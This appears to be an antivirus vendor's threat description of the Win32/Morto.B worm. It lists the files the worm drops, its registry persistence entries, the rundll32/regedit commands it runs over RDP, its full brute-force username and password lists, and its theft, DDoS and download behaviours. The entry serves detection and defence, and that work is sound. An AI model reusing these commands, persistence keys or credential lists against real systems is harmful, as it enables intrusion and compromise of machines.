Win32/Morto [Threat Name] go to Threat

Win32/Morto.B [Threat Variant Name]

Category	worm
Size	49932 B
Aliases	Net-Worm.Win32.Morto.b (Kaspersky)
	W32/Morto.a.virus (McAfee)
	Worm:Win32/Morto.gen!A (Microsoft)

Short description

Win32/Morto.B is a worm that spreads via network exploiting vulnerabilities of the operating system. The worm tries to download and execute several files from the Internet.

Installation

When executed, the worm creates the following files:

%windir%\clb.dll (6656 B, Win32/Morto.B)
%windir%\Offline Web Pages\cache.txt (6656 B, Win32/Morto.B)
%windir%\temp\ntshrui.dll (6656 B, Win32/Morto.B)

The worm may create copies of the following files (source, destination):

%system%\sens.dll, %system%\sens32.dll
%system%\ntmssvc.dll, %system%\ntmssvc32.dll
%system%\netman.dll, %system%\netman32.dll
%system%\rasauto.dll, %system%\rasauto32.dll

The following Registry entries are created:

[HKEY_LOCAL_MACHINE\CurrentControlSet\Services\%existingservicename%\Parameters]
- "ServiceDll" = "%windir%\temp\ntshrui.dll"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows]
- "NoPopUpsOnBoot" = 1
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Minimal\%existingservicename%]
- "(Default)" = "Service"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\%copiedservicename%]
- "DependOnService" = ""
- "Group" = "SchedulerGroup"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\%copiedservicename%\Parameters]
- "ServiceDll" = "%originaldll%32.dll"
[HKEY_LOCAL_MACHINE\System\Wpa]
- "it" = "%variable1%"
- "rmk" = "%variable2%"
- "if" = "%variable3%"
- "ct" = "%variable4%"
- "lscan" = "%variable5%"
- "rmd" = "%variable6%"
- "cmd" = "%variable7%"
- "md" = %malwarebody%
- "ie" = "%malwarefilepath%"
- "sn" = "%servicename1%"
- "sr" = "%servicename2%"

A string with variable content is used instead of %variable1-7% .

After the installation is complete, the worm deletes the original executable file.

Spreading

Win32/Morto.B is a worm that spreads via network exploiting vulnerabilities of the operating system.

The worm generates various IP addresses. If it succeeds, a copy of the worm is retrieved from the attacking machine using RDP protocol.

The following files are dropped:

a.dll (6656 B, Win32/Morto.b)
r.reg (1198 B)

The worm executes the following commands:

regedit /s\\tsclient\a\r.reg
rundll32\\tsclient\a\a.dll

The following usernames are used:

1
a
actuser
adm
admin
admin1
admin2
administrator
aspnet
backup
console
david
guest
john
owner
root
server
sql
support
support_388945a0
sys
test
test1
test2
test3
user
user1
user2
user3
user4
user5

The following passwords are used:

!@#$
!@#$%
!@#$%^
!@#$%^&*
%u%
%u%1
%u%111111
%u%12
%u%123
%u%1234
%u%123456
0
000000
1
111
1111
111111
1111111
111222
112233
11223344
12
121212
123
123123
123321
12344321
12345
123456
1234567
12345678
123456789
1234567890
1234qwer
1313
1314520
159357
168168
1q2w3e
1QAZ
1qaz2wsx
2010
2011
2012
2222
22222222
3
31415926
369
4321
520
520520
654321
666666
7
7777
7777777
77777777
789456
888888
88888888
987654
987654321
999999
a
aaa
abc
abc123
abcd
abcd1234
admin
admin123
computer
dragon
iloveyou
letmein
pass
password
PASSWORD
princess
qazwsx
rockyou
root
secret
server
super
test
user
Z1234
zxcvbnm

Information stealing

The worm collects the following information:

CPU information
memory status
antivirus software detected on the affected machine

The worm attempts to send gathered information to a remote machine.

Other information

The worm acquires data and commands from a remote computer or the Internet.

The worm contains a list of (9) URLs.

It can execute the following operations:

perform DoS/DDoS attacks
send gathered information

The worm tries to download several files from the Internet.

These are stored in the following locations:

%temp%\~MTMP%variable%.exe

The files are then executed.

The %variable% represents a random number.